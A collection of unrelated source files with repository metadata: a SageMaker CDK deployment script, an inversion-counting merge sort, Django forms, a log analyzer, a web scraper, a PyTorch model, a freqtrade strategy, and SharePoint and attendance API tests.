] | permissive | DavidykZhao/amazon-sagemaker-drift-detection | 7046a7102e1d45334fa56bda1c8adb22c0c481c7 | 3eb7af7ee0923f76a9900bea0eace2da7d6be8a9 | refs/heads/main | 2023-08-22T05:37:26.964116 | 2021-09-17T03:57:32 | 2021-09-17T03:57:32 | 411,586,937 | 0 | 0 | MIT-0 | 2021-09-29T08:15:02 | 2021-09-29T08:15:01 | null | UTF-8 | Python | false | false | 4,751 | py | #!/usr/bin/env python3
import argparse
import json
import logging
import os
from aws_cdk import core
from infra.deployment_config import DeploymentConfig, VariantConfig
from infra.sagemaker_stack import SageMakerStack
from infra.model_registry import ModelRegistry
# Configure the logger
logger = logging.getLogger(__name__)
logging.basicConfig(level="INFO")
registry = ModelRegistry()
def create_endpoint(
    app: core.App,
    project_name: str,
    project_id: str,
    sagemaker_execution_role: str,
    artifact_bucket: str,
    stage_name: str,
):
    """Create the SageMaker endpoint CDK stack for one deployment stage.

    Reads ``<stage_name>-config.json``, resolves the model package to
    deploy from the model registry (latest approved, or the version pinned
    in the config), and wires the baseline / data-capture / monitoring S3
    locations into the stack.

    Raises:
        Exception: If the derived endpoint name exceeds SageMaker's
            63-character limit.
    """
    # Define variables for passing down to stacks
    endpoint_name = f"sagemaker-{project_name}-{stage_name}"
    if len(endpoint_name) > 63:
        raise Exception(
            f"SageMaker endpoint: {endpoint_name} must be less than 64 characters"
        )
    logger.info(f"Create endpoint: {endpoint_name}")

    # Define the deployment tags
    tags = [
        core.CfnTag(key="sagemaker:deployment-stage", value=stage_name),
        core.CfnTag(key="sagemaker:project-id", value=project_id),
        core.CfnTag(key="sagemaker:project-name", value=project_name),
    ]

    # Get the stage specific deployment config for sagemaker
    with open(f"{stage_name}-config.json", "r") as f:
        j = json.load(f)
        deployment_config = DeploymentConfig(**j)

    # Set the model package group to project name
    package_group_name = project_name

    # If we don't have a specific champion variant defined, get the latest approved
    if deployment_config.variant_config is None:
        logger.info("Selecting latest approved")
        p = registry.get_latest_approved_packages(package_group_name, max_results=1)[0]
        deployment_config.variant_config = VariantConfig(
            model_package_version=p["ModelPackageVersion"],
            model_package_arn=p["ModelPackageArn"],
            initial_variant_weight=1,
            instance_count=deployment_config.instance_count,
            instance_type=deployment_config.instance_type,
        )
    else:
        # Get the versioned package and update ARN
        version = deployment_config.variant_config.model_package_version
        logger.info(f"Selecting variant version {version}")
        p = registry.get_versioned_approved_packages(
            package_group_name,
            model_package_versions=[version],
        )[0]
        deployment_config.variant_config.model_package_arn = p["ModelPackageArn"]

    # Get the pipeline execution to get the baseline uri, for passing into
    # the stack so drift monitoring can compare against it.
    pipeline_execution_arn = registry.get_pipeline_execution_arn(
        deployment_config.variant_config.model_package_arn
    )
    baseline_uri = registry.get_processing_output(pipeline_execution_arn)
    logger.info(f"Got baseline uri: {baseline_uri}")

    # Stage-independent S3 prefixes under the shared artifact bucket.
    data_capture_uri = f"s3://{artifact_bucket}/{project_id}/datacapture"
    logger.info(f"Got data capture uri: {data_capture_uri}")
    reporting_uri = f"s3://{artifact_bucket}/{project_id}/monitoring"
    logger.info(f"Got reporting uri: {reporting_uri}")

    return SageMakerStack(
        app,
        f"drift-deploy-{stage_name}",
        sagemaker_execution_role=sagemaker_execution_role,
        deployment_config=deployment_config,
        endpoint_name=endpoint_name,
        baseline_uri=baseline_uri,
        data_capture_uri=data_capture_uri,
        reporting_uri=reporting_uri,
        tags=tags,
    )
def main(
    project_name: str,
    project_id: str,
    sagemaker_execution_role: str,
    artifact_bucket: str,
):
    """Synthesize the CDK app with one SageMaker endpoint stack per stage."""
    app = core.App()
    # Staging and production get structurally identical stacks, so build
    # both from the same call.
    for stage in ("staging", "prod"):
        create_endpoint(
            app,
            project_name=project_name,
            project_id=project_id,
            sagemaker_execution_role=sagemaker_execution_role,
            artifact_bucket=artifact_bucket,
            stage_name=stage,
        )
    app.synth()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Load parameters")
parser.add_argument(
"--project-name",
default=os.environ.get("SAGEMAKER_PROJECT_NAME"),
)
parser.add_argument("--project-id", default=os.environ.get("SAGEMAKER_PROJECT_ID"))
parser.add_argument(
"--sagemaker-execution-role",
default=os.environ.get("SAGEMAKER_EXECUTION_ROLE_ARN"),
)
parser.add_argument(
"--artifact-bucket",
default=os.environ.get("ARTIFACT_BUCKET"),
)
args = vars(parser.parse_args())
print("args: {}".format(args))
main(**args)
| [
"brightsparc@gmail.com"
] | brightsparc@gmail.com |
0534f06fd3773119e60cd20e503f027d74b7b8a9 | 97b6fae3c84c7f469357e19a88ef3869eb68c2ad | /countinversion.py | 2db8e830c61f421770394ca7feac57336db916b5 | [] | no_license | shuric80/Algorithm-for-Counting-Inversions | b48265fa3578d1a2bb3b1ccbe41c9b40173bc5cf | 691ed3d8970c46c66f92dad101b721e5764ceb44 | refs/heads/main | 2023-04-11T09:19:33.805859 | 2021-04-29T05:54:04 | 2021-04-29T05:54:04 | 362,703,175 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 983 | py | import sys
from typing import List, Tuple
def merge(left: List[int], right: List[int],
          mid: int) -> Tuple[List[int], int]:
    """Merge two sorted lists, counting inversions across the split.

    *mid* is the length of *left*: whenever an element of *right* is
    placed before the remaining elements of *left*, each of those
    ``mid - i`` elements forms one inversion.
    """
    i, j = 0, 0
    cnt = 0
    output: List[int] = []
    while i < len(left) and j < len(right):
        # '<=' (not '<') so equal elements advance the left pointer; the
        # original strict comparisons matched neither branch on duplicates
        # and looped forever. Equal pairs are not inversions, so taking
        # the left element first keeps the count correct.
        if left[i] <= right[j]:
            output.append(left[i])
            i += 1
        else:
            output.append(right[j])
            j += 1
            cnt += (mid - i)
    output.extend(left[i:])
    output.extend(right[j:])
    return output, cnt


def count(l_input: List[int]) -> Tuple[List[int], int]:
    """Return (sorted copy of *l_input*, inversion count) via merge sort.

    The original annotation claimed ``-> int`` although a tuple is
    returned; fixed to match the actual contract.
    """
    if len(l_input) < 2:
        return l_input[:], 0
    middle = len(l_input) // 2
    left_sorted, left_inv = count(l_input[:middle])
    right_sorted, right_inv = count(l_input[middle:])
    merged, split_inv = merge(left_sorted, right_sorted, middle)
    return merged, split_inv + left_inv + right_inv
if __name__ == '__main__':
    # Read one integer per line from data.txt and report its inversion count.
    with open('data.txt') as f:
        data = f.read()
    rows = [int(i) for i in data.split('\n') if i != '']
    _, cnt = count(rows)
    sys.stdout.write(f'Total count inversion: {cnt}')
| [
"noreply@github.com"
] | shuric80.noreply@github.com |
32bbda061e040728ba6143a2721c144d277bbc40 | 11c840ba7492f16d0d2501efb117ac39dced4424 | /badsound/forms.py | 84c9187a10b628170dcccfdb9ab6a6b6ced6533a | [] | no_license | t00n/badsound | c5f464886095d3567a89fee15cc69993a6e70454 | ba31a30a481dee7530260dfb646b04edbbbd49d3 | refs/heads/master | 2021-01-10T03:14:54.811389 | 2015-10-30T16:33:46 | 2015-10-30T16:33:46 | 45,058,765 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,118 | py | from django.forms import ModelForm, URLField, DateField, Form
from bootstrap3_datetime.widgets import DateTimePicker
from .models import Music, Vote
class AddMusicForm(ModelForm):
    """Form for submitting a new Music entry by URL."""

    class Meta:
        model = Music
        fields = ['url']

class AddVoteForm(ModelForm):
    """Form for recording a head-to-head vote between two tracks."""

    class Meta:
        model = Vote
        fields = ['music1', 'music2', 'winner']
class ShowRankingForm(Form):
    """Optional date-range filter for the ranking page.

    Both bounds are optional; when both are given, the end date must not
    precede the start date.
    """

    start_date = DateField(required=False, input_formats=['%d/%m/%Y'], widget=DateTimePicker(options={'format': 'DD/MM/YYYY', 'pickTime': False}))
    end_date = DateField(required=False, input_formats=['%d/%m/%Y'], widget=DateTimePicker(options={'format': 'DD/MM/YYYY', 'pickTime': False}))

    def clean(self):
        """Reject ranges whose end date precedes the start date."""
        cleaned_data = super(ShowRankingForm, self).clean()
        start_date = cleaned_data.get("start_date")
        end_date = cleaned_data.get("end_date")
        if start_date and end_date and end_date < start_date:
            # The original raised ``forms.ValidationError`` although the
            # name ``forms`` was never imported, turning every invalid
            # range into a NameError. ValidationError is now imported
            # directly from django.forms. The unused ``status`` lookup
            # was also dropped.
            raise ValidationError(
                "La date de fin ne peut etre avant la date de debut"
            )
        # Django convention: clean() returns the cleaned data.
        return cleaned_data
"kelkununtel@hotmail.com"
] | kelkununtel@hotmail.com |
bb918660688b08138dfff3f921550e5811812b22 | 6ed01f4503fc9de234a561c945adff7cf4b1c81b | /dcsTools/logTools/LogAnalizer.py | b87902b91912124b60bb08ef9caa08a1222ab954 | [] | no_license | ostwald/python-lib | b851943c913a68424a05ce3c7b42878ff9519f68 | 9acd97ffaa2f57b3e9e632e1b75016549beb29e5 | refs/heads/master | 2021-10-28T06:33:34.156095 | 2021-10-21T23:54:49 | 2021-10-21T23:54:49 | 69,060,616 | 0 | 1 | null | 2018-06-21T16:05:30 | 2016-09-23T21:04:46 | Roff | UTF-8 | Python | false | false | 2,332 | py | """
tool for analyzing catalina.out log files
e.g., "C:/Documents and Settings/ostwald/My Documents/DCS/Log Analysis/Catalina Logs/dcc-log.txt"
parses the log file and returns a list of Request objects
"""
import string
import sys
import os
import re
from time import strptime, strftime, gmtime, localtime, asctime, time, mktime
from Request import Request, logTimeToSecs
pat = re.compile ("\n\n")
def getRequests (path, filters=None):
    """
    Split the log file into "blobs" (chunks of text separated by a blank
    line) and build a Request object for every blob that contains output
    from the struts RequestProcessor.

    ``filters`` is an optional string, or list of strings, each a Python
    expression over the local name ``request`` (e.g.
    "request.sessionId == '...'"). All expressions are joined with
    " and " and evaluated for every candidate request.

    NOTE(review): the filter expressions are run through eval(), which
    executes arbitrary code — only pass trusted filter strings.
    """
    # Accept a single filter string as well as a list of them.
    if type (filters) == type ("blah"):
        filters = [filters]
    s = open (path, 'r').read()
    blobs = s.split ("\n\n")
    print "processing %d blobs" % len (blobs)
    requests = []
    for blob in blobs:
        line1 = blob.split("\n")[0]
        # Only blobs whose first line comes from the RequestProcessor are
        # request entries; anything else (stack traces etc.) is skipped.
        if string.find (line1, "org.apache.struts.action.RequestProcessor process") != -1:
            try:
                request = Request (blob)
            except:
                # Malformed entry: report it and keep going with the rest.
                print "failed to contstruct Request:", sys.exc_type, sys.exc_value
                continue
            if filters:
                if (eval (string.join (filters, " and "))):
                    requests.append (request)
##                accept = True
##                for filter in filters:
##                    if not (eval (filter)):
##                        accept = False
##                        break
##                if accept:
##                    requests.append (request)
            else:
                requests.append (request)
    return requests
if __name__ == "__main__":
t1 = "Aug 12, 2005 12:00:01 AM"
t2 = "Aug 13, 2005 5:00:00 PM"
t1secs = logTimeToSecs (t1)
t2secs = logTimeToSecs (t2)
filters = None
path = "C:/Documents and Settings/ostwald/My Documents/DCS/Log Analysis/Catalina Logs/dcc-log.txt"
sessionId = "1DE5755F9DE662AD2D1615E23801027B"
filter1 = "request.sessionId == '%s'" % sessionId
filter2 = "request.time_stamp > %s and request.time_stamp < %s" % (t1secs, t2secs)
filter3 = "request.isStatusEvent()"
filters = (filter3,filter2)
requests = getRequests(path, filters)
if filters:
print "filters"
for f in filters:
print "\t" + f
print "%d requests extracted" % len (requests)
for i in range (min (len (requests), 10)):
print "\n-- %d / %d --\n%s" % ( i, len (requests), requests[i].log_entry)
## print "\n-- %d --%s" % ( i, requests[i].time_stamp)
| [
"ostwald@ucar.edu"
] | ostwald@ucar.edu |
f27e2f2cc8ef12eb3d323fbd3190a05d27836935 | 404a8596d3c4a55efe57e6fe5f2f19747a487e28 | /baekjoon/5565_receipt.py | aea7c94e573bc71e5e01f4d21b41b01260efb873 | [] | no_license | taehwan920/Algorithm | 370b72e48ba404ae1fb7a7786165b88a8daf090a | f837034d0c2f7cac370eb8cceacb8b3827ec62f9 | refs/heads/master | 2021-08-17T07:14:33.594428 | 2021-01-01T14:26:35 | 2021-01-01T14:26:35 | 237,892,425 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 68 | py | n = int(input())
for i in range(9):
n -= int(input())
print(n)
| [
"taehwan920@gmail.com"
] | taehwan920@gmail.com |
b00b4c70cd0f6c2cd2530dd2f1e490e5fb3a9388 | 748b17bfd33dbfc6d20b2373f3a11560450b8d52 | /scrape2.py | e935e89a3ae05a6a4b2fe30827a927795d70ac89 | [] | no_license | chrisgits/scraper | 1ced163b88106fe2eb1811eda627cf6f8937409f | 20d90c4d24afe98f552bce1efbee3c6ea6c9d99f | refs/heads/master | 2021-01-23T14:15:04.213265 | 2017-09-07T02:09:28 | 2017-09-07T02:09:28 | 102,679,731 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,331 | py | import bs4
import json
from urllib.request import urlopen as uReq
from bs4 import BeautifulSoup as soup
def writeToJSONFile(path, fileName, data):
filePathNameWExt = "./" + path + "/" + fileName + '.json'
with open(filePathNameWExt, 'w') as fp:
json.dump(data, fp)
#json file write
path = "./"
fileName = "2017roster"
my_url = "https://hailvarsity.com/nebraska-football/roster"
uClient = uReq(my_url) #opens conn and parses page into var
page_html = uClient.read() #reads page into var
uClient.close() #closes conn
#parse HTML into page_soup var
page_soup = soup(page_html, "html.parser")
#find the class that has the roster table data
players = page_soup.findAll("div", {"class":"row"})
#loop over each row to find player data
for player in players:
number_tag = player.find("div", class_="number")
number = number_tag.text.strip()
name_tag = player.find("div", class_="name")
name = name_tag.contents[1].text
position_tag = player.find("div", class_="position")
position = position_tag.text.strip()
photo_div = player.find("img", class_="mug")
photo_url = photo_div["src"]
year = player.find("span", class_="class-long").text
data = {"number":number, "name":name, "position":position, "mug_url":photo_url,"year":year}
writeToJSONFile(path, fileName, data)
| [
"cmannel77@gmail.com"
] | cmannel77@gmail.com |
f08b46d1aad2ae8911316c4e7164b6e1920f3dc8 | 54b52db8e81ef9c8ac6d0a78a387a51e613124d7 | /virtual/bin/chardetect | 85a78d7dcef37770191a811a3ec9865ef65301f5 | [
"MIT"
] | permissive | virginiah2020/Instagram | 749eacf32d6d7e916d46fb1ecb6a7522e9017743 | fa7abee248f28daea1b532b9eef1fd859ca718d2 | refs/heads/master | 2022-12-10T17:28:31.440559 | 2020-08-24T12:35:14 | 2020-08-24T12:35:14 | 288,934,042 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 285 | #!/home/moringa-school-1063/Desktop/Instagram-Clone-master/virtual/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from chardet.cli.chardetect import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"vancyvy254@gmail.com"
] | vancyvy254@gmail.com | |
1e927f176dc02de18d93a195674c83f0a96b7dad | 121e7e11e7a9b0bf1f017715bc50974397c23c47 | /models.py | 3adffd8b155368f045015cf4cbcc4318fd21febc | [] | no_license | ChaiBapchya/dl_radiologist | 8ed119ca8da1a2a49dfa081464a0f934fa7a771b | 5bb81bb8134944e74ee221bf5f86c43ce5c9e8e0 | refs/heads/master | 2020-05-26T21:37:49.139713 | 2019-08-18T00:08:44 | 2019-08-18T00:08:44 | 188,382,402 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,835 | py | import torch
import torch.nn as nn
class Network(nn.Module):
def __init__(self):
super(Network, self).__init__()
# Adjust values according to image size
self.features = nn.Sequential(
nn.Conv2d(in_channels=1, out_channels=6, kernel_size=9, stride=1, padding=0, bias=False),
nn.BatchNorm2d(num_features=6),
nn.MaxPool2d(kernel_size=2, stride=2, padding=0),
nn.ReLU(),
nn.Conv2d(in_channels=6, out_channels=11, kernel_size=5, stride=1, padding=0, bias=False),
nn.BatchNorm2d(num_features=11),
nn.MaxPool2d(kernel_size=4, stride=2, padding=0),
nn.ReLU(),
nn.Dropout(p=0.25),
nn.Conv2d(in_channels=11, out_channels=12, kernel_size=9, stride=1, padding=0),
nn.MaxPool2d(kernel_size=4, stride=3, padding=0),
nn.ReLU()
)
self.classifier = nn.Sequential(
nn.Linear(400*12, 30*14),
nn.Dropout(p=0.3),
nn.ReLU(),
nn.Linear(30*14, 14)
)
# Is Initializing needed?
for name, m in self.named_modules():
if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):
# Initializing weights with randomly sampled numbers from a normal
# distribution.
m.weight.data.normal_(0, 1)
m.weight.data.mul_(1e-2)
if m.bias is not None:
# Initializing biases with zeros.
nn.init.constant_(m.bias.data, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.bias.data, 0)
nn.init.constant_(m.weight.data, 1)
def forward(self, x):
feat = self.features(x)
feat = feat.view(-1,400*12)
op = self.classifier(feat)
return op.squeeze()
| [
"chai.bapat@gmail.com"
] | chai.bapat@gmail.com |
6dbe367d617ed99fe5dba405b67d30a3daaf7ff8 | 6fa30fbbfd2876db0e2f5c86a2af5d48bcf474de | /Maro4h_Macd_Sd.py | 3a3d1f6f783d91bb89ac75c7ecfc6a2ba31e6d4e | [
"MIT"
] | permissive | AhmedSakrr/Freqtrade_strategies-2 | bcc1c21221d884a0cf6446fb6f45e50fe1b93e13 | b6b4c1a236584f5369462469c62e69b09253c3b6 | refs/heads/main | 2023-04-12T16:49:01.906026 | 2021-05-18T13:20:24 | 2021-05-18T13:20:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,564 | py | # --- Do not remove these libs ---
from freqtrade.strategy.interface import IStrategy
from typing import Dict, List
from functools import reduce
from pandas import DataFrame
# --------------------------------
import datetime
import talib.abstract as ta
import freqtrade.vendor.qtpylib.indicators as qtpylib
import numpy as np # noqa
class Maro4hMacdSd(IStrategy):
max_open_trades = 1
stake_amount = 500
# Minimal ROI designed for the strategy.
# This attribute will be overridden if the config file contains "minimal_roi"
stoploss = -0.21611
minimal_roi = {
"0": 0.24627,
"24": 0.06484,
"38": 0.02921,
"145": 0
}
# Optimal timeframe for the strategy
timeframe = '5m'
# trailing stoploss
trailing_stop = False
trailing_stop_positive = 0.1
trailing_stop_positive_offset = 0.2
# run "populate_indicators" only for new candle
process_only_new_candles = True
# Experimental settings (configuration will overide these if set)
use_sell_signal = True
sell_profit_only = False
ignore_roi_if_buy_signal = False
# Optional order type mapping
order_types = {
'buy': 'limit',
'sell': 'limit',
'stoploss': 'market',
'stoploss_on_exchange': False
}
def populate_indicators(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
"""
Adds several different TA indicators to the given DataFrame
Performance Note: For the best performance be frugal on the number of indicators
you are using. Let uncomment only the indicator you are using in your strategies
or your hyperopt configuration, otherwise you will waste your memory and CPU usage.
"""
# MACD
macd = ta.MACD(dataframe,fastperiod=12, slowperiod=26, signalperiod=9)
dataframe['macd'] = macd['macd']
dataframe['macdsignal'] = macd['macdsignal']
dataframe['macdhist'] = 100*macd['macdhist']/dataframe['close']
dataframe['corr'] = ta.STDDEV(dataframe, timeperiod=28)
dataframe['corr_mean'] = ta.MA(dataframe['corr'], timeperiod=28)
dataframe['corr_sell'] = ta.STDDEV(dataframe, timeperiod=28)
dataframe['corr_mean_sell'] = ta.MA(dataframe['corr'], timeperiod=28)
return dataframe
def populate_buy_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
"""
Based on TA indicators, populates the buy signal for the given dataframe
:param dataframe: DataFrame
:return: DataFrame with buy column
"""
dataframe.loc[
(
(dataframe['macdhist'] < 0) &
(dataframe['macdhist'].shift(2) > dataframe['macdhist'].shift(1))
& (dataframe['macdhist'] > dataframe['macdhist'].shift(2))
&
(dataframe['corr'] > dataframe['corr_mean'])
),'buy'] = 1
return dataframe
def populate_sell_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
"""
Based on TA indicators, populates the sell signal for the given dataframe
:param dataframe: DataFrame
:return: DataFrame with buy column
"""
dataframe.loc[
(
(dataframe['macdhist'] > 0) &
(dataframe['macdhist'].shift(2) < dataframe['macdhist'].shift(1))
&(dataframe['macdhist'] < dataframe['macdhist'].shift(2)) &
(dataframe['corr_sell'] < dataframe['corr_mean_sell'])
),'sell'] = 1
return dataframe | [
"34077513+Kamelchahbi@users.noreply.github.com"
] | 34077513+Kamelchahbi@users.noreply.github.com |
71d201020a8661345685b3fe0dcde8ba8c88b1f4 | 49ba5356bdc5df7dd9803b56fe507c5164a90716 | /plus-one/test_solution.py | 574ad18d65637674d36fc84b6ad97ac231f5ded6 | [] | no_license | uxlsl/leetcode_practice | d80ad481c9d8ee71cce0f3c66e98446ced149635 | d8ed762d1005975f0de4f07760c9671195621c88 | refs/heads/master | 2021-04-25T18:12:28.136504 | 2020-03-11T07:54:15 | 2020-03-11T07:54:15 | 121,472,384 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 243 | py | from solution import Solution
def test_solution():
s = Solution()
assert s.plusOne([1]) == [2]
assert s.plusOne([1, 2, 3]) == [1, 2, 4]
assert s.plusOne([1, 2, 9]) == [1, 3, 0]
assert s.plusOne([9, 9, 9]) == [1, 0, 0, 0]
| [
"songlin.lin@yundata.com"
] | songlin.lin@yundata.com |
d4dcf28a56df6392227f886cba49f02edc0a4425 | 9152c6f5b692694c4cb95725319fc8dd21d30455 | /tests/test_sharepoint_group.py | 35ff7ddb18dd00b39d3d1f90d47262fff460b3cf | [
"MIT"
] | permissive | VISIN9/Office365-REST-Python-Client | cf3de86a6bdd2461ff5814dbfa02d4d4185917d5 | 91c07d427a76197f6eb143c6253bdc832cbb889d | refs/heads/master | 2021-05-25T08:43:35.530546 | 2020-04-06T20:24:53 | 2020-04-06T20:24:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,336 | py | from tests.sharepoint_case import SPTestCase
class TestSharePointGroup(SPTestCase):
@classmethod
def setUpClass(cls):
super(TestSharePointGroup, cls).setUpClass()
cls.target_user_name = "i:0#.f|membership|mdoe@mediadev8.onmicrosoft.com"
target_group_name = "Communication site Visitors"
cls.target_group = cls.client.web.siteGroups.get_by_name(target_group_name)
def test1_get_current_user_groups(self):
groups = self.client.web.currentUser.groups
self.client.load(groups)
self.client.execute_query()
self.assertGreaterEqual(len(groups), 0)
def test2_add_user_to_group(self):
target_user = self.target_group.users.add_user(self.target_user_name)
self.client.execute_query()
self.assertIsNotNone(target_user.properties['Id'])
def test3_delete_user_from_group(self):
target_users = self.target_group.users
self.client.load(target_users)
self.client.execute_query()
users_count_before = len(target_users)
self.assertGreater(users_count_before, 0)
user_id = target_users[0].properties['Id']
target_users.remove_by_id(user_id)
self.client.load(target_users)
self.client.execute_query()
self.assertEqual(users_count_before, len(target_users) + 1)
| [
"vvgrem@gmail.com"
] | vvgrem@gmail.com |
edee59048bf7db2a486cc4da27fba9608ec32e7a | 909ae0ab0f4fe78de433c3d72b34b84848303ee8 | /lending-club/venv/bin/jupyter-kernel | d0fe4631191e2897d3d90fd697e3b7c5e8f6b55c | [] | no_license | jakekasan/data-science | f5cf2a7c0ead56e04a3549b930ca974495faae49 | 4bf589c268c517525abf3170c24cf42e0ae872cf | refs/heads/master | 2021-09-17T21:18:51.278247 | 2018-07-05T07:31:51 | 2018-07-05T07:31:51 | 114,106,343 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 280 | #!/Users/jakubkasan/coding/data-science/lending-club/venv/bin/python3.6
# -*- coding: utf-8 -*-
import re
import sys
from jupyter_client.kernelapp import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"jake.kasan@gmail.com"
] | jake.kasan@gmail.com | |
384b044a26741c3691f5aad15dccf32d43789fcd | 184310f55b58e854dc3b6c58599ef99bc4c95739 | /hujian_api/API_service/TestCase/Attendance_analyse_late_02.py | f08ad74fb962f34245281fa4384265995c3344b0 | [] | no_license | tanjijun1/Python_API | c8585821a627c399fea1ab31bb024be6b82dd3ab | 3c4771875870ffe425d2d39fc28a50449b1752f2 | refs/heads/master | 2023-01-07T23:30:30.284433 | 2020-11-11T08:43:10 | 2020-11-11T08:43:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,314 | py | import pytest
import allure
import requests
import json
import time
from Params.params import Login
from Params.params import Login_info
from Params.params import Password_reset
from Params.params import Log_info
from Params.params import Log_latest
from Params.params import Log_list
from Params.params import Attendance_groups_sync
from Params.params import Attendance_schedules_sync
from Params.params import Attendance_records_sync
from Params.params import Flow_sync
from Params.params import Department_sync
from Params.params import Department_list
from Params.params import Department_employees_list
from Params.params import Department_employee_query
from Params.params import Attendance_class_list
from Params.params import Attendance_analyse
from Params.params import Attendance_analyse_result
from Params.params import Attendance_analyse_result_statistics
from Common import Post
from Common import Get
from Common import Assert
from Common import Consts
class Attendance_analyse_late_02:
@allure.severity('normal')
@allure.feature('Attendance_analyse')
@allure.story('Attendance_analyse_late')
def test_late_02(self):
session_a = requests.session()
get_req = Get.Get()
ass = Assert.Assertions()
url_2019_10 = 'http://172.16.2.101:4000/api/attendance/analyse?startDate=2019-10-01 00:00:00&endDate=2019-10-31 00:00:00&userIds=056621220036405378'
#分析 用户056621220036405378 2019年10月 考勤
res_2019_10 = get_req.get_model_a(session_a,url_2019_10)
time.sleep(10)
resCode_2019_10 = res_2019_10['code']
resText_2019_10 = res_2019_10['text']
#print(resText_2019_10)
assert ass.assert_code(resCode_2019_10, 200)
assert ass.assert_in_text(resText_2019_10, 'ok')
Consts.RESULT_LIST.append('True')
url_2019_11 = 'http://172.16.2.101:4000/api/attendance/analyse?startDate=2019-11-01 00:00:00&endDate=2019-11-30 00:00:00&userIds=056621220036405378'
# 分析 用户056621220036405378 2019年11月 考勤
res_2019_11 = get_req.get_model_a(session_a, url_2019_11)
time.sleep(10)
resCode_2019_11 = res_2019_11['code']
resText_2019_11 = res_2019_11['text']
#print(resText_2019_11)
assert ass.assert_code(resCode_2019_11, 200)
assert ass.assert_in_text(resText_2019_11, 'ok')
Consts.RESULT_LIST.append('True')
url_2019_12 = 'http://172.16.2.101:4000/api/attendance/analyse?startDate=2019-12-01 00:00:00&endDate=2019-12-31 00:00:00&userIds=056621220036405378'
# 分析 用户056621220036405378 2019年12月 考勤
res_2019_12 = get_req.get_model_a(session_a, url_2019_12)
time.sleep(10)
resCode_2019_12 = res_2019_12['code']
resText_2019_12 = res_2019_12['text']
#print(resText_2019_12)
assert ass.assert_code(resCode_2019_12, 200)
assert ass.assert_in_text(resText_2019_12, 'ok')
Consts.RESULT_LIST.append('True')
url_result_2019_10 = 'http://172.16.2.101:4000/api/attendance/analyse/list?userId=056621220036405378&startDate=2019-10-01 00:00:00&endDate=2019-10-31 00:00:00&pageSize=31'
#获取 用户056621220036405378 2019年10月 考勤分析结果
res_result_2019_10 = get_req.get_model_a(session_a,url_result_2019_10)
res_resultCode_2019_10 = res_result_2019_10['code']
res_resultText_2019_10 = res_result_2019_10['text']
assert ass.assert_code(res_resultCode_2019_10, 200)
assert ass.assert_in_text(res_resultText_2019_10, 'ok')
Consts.RESULT_LIST.append('True')
url_result_2019_11 = 'http://172.16.2.101:4000/api/attendance/analyse/list?userId=056621220036405378&startDate=2019-11-01 00:00:00&endDate=2019-11-30 00:00:00&pageSize=31'
# 获取 用户056621220036405378 2019年11月 考勤分析结果
res_result_2019_11 = get_req.get_model_a(session_a, url_result_2019_11)
res_resultCode_2019_11 = res_result_2019_11['code']
res_resultText_2019_11 = res_result_2019_11['text']
assert ass.assert_code(res_resultCode_2019_11, 200)
assert ass.assert_in_text(res_resultText_2019_11, 'ok')
Consts.RESULT_LIST.append('True')
url_result_2019_12 = 'http://172.16.2.101:4000/api/attendance/analyse/list?userId=056621220036405378&startDate=2019-12-01 00:00:00&endDate=2019-12-31 00:00:00&pageSize=31'
# 获取 用户056621220036405378 2019年12月 考勤分析结果
res_result_2019_12 = get_req.get_model_a(session_a, url_result_2019_12)
res_resultCode_2019_12 = res_result_2019_12['code']
res_resultText_2019_12 = res_result_2019_12['text']
assert ass.assert_code(res_resultCode_2019_12, 200)
assert ass.assert_in_text(res_resultText_2019_12, 'ok')
Consts.RESULT_LIST.append('True')
res_resultDict_2019_10 = json.loads(res_resultText_2019_10)
resInfo_10_01 = res_resultDict_2019_10['result']['list'][0]
resInfo_10_02 = res_resultDict_2019_10['result']['list'][1]
resInfo_10_03 = res_resultDict_2019_10['result']['list'][2]
resInfo_10_04 = res_resultDict_2019_10['result']['list'][3]
resInfo_10_05 = res_resultDict_2019_10['result']['list'][4]
resInfo_10_06 = res_resultDict_2019_10['result']['list'][5]
resInfo_10_07 = res_resultDict_2019_10['result']['list'][6]
resInfo_10_08 = res_resultDict_2019_10['result']['list'][7]
resInfo_10_09 = res_resultDict_2019_10['result']['list'][8]
resInfo_10_10 = res_resultDict_2019_10['result']['list'][9]
resInfo_10_11 = res_resultDict_2019_10['result']['list'][10]
resInfo_10_12 = res_resultDict_2019_10['result']['list'][11]
resInfo_10_13 = res_resultDict_2019_10['result']['list'][12]
resInfo_10_14 = res_resultDict_2019_10['result']['list'][13]
resInfo_10_15 = res_resultDict_2019_10['result']['list'][14]
resInfo_10_16 = res_resultDict_2019_10['result']['list'][15]
resInfo_10_17 = res_resultDict_2019_10['result']['list'][16]
resInfo_10_18 = res_resultDict_2019_10['result']['list'][17]
resInfo_10_19 = res_resultDict_2019_10['result']['list'][18]
resInfo_10_20 = res_resultDict_2019_10['result']['list'][19]
resInfo_10_21 = res_resultDict_2019_10['result']['list'][20]
resInfo_10_22 = res_resultDict_2019_10['result']['list'][21]
resInfo_10_23 = res_resultDict_2019_10['result']['list'][22]
resInfo_10_24 = res_resultDict_2019_10['result']['list'][23]
resInfo_10_25 = res_resultDict_2019_10['result']['list'][24]
resInfo_10_26 = res_resultDict_2019_10['result']['list'][25]
resInfo_10_27 = res_resultDict_2019_10['result']['list'][26]
resInfo_10_28 = res_resultDict_2019_10['result']['list'][27]
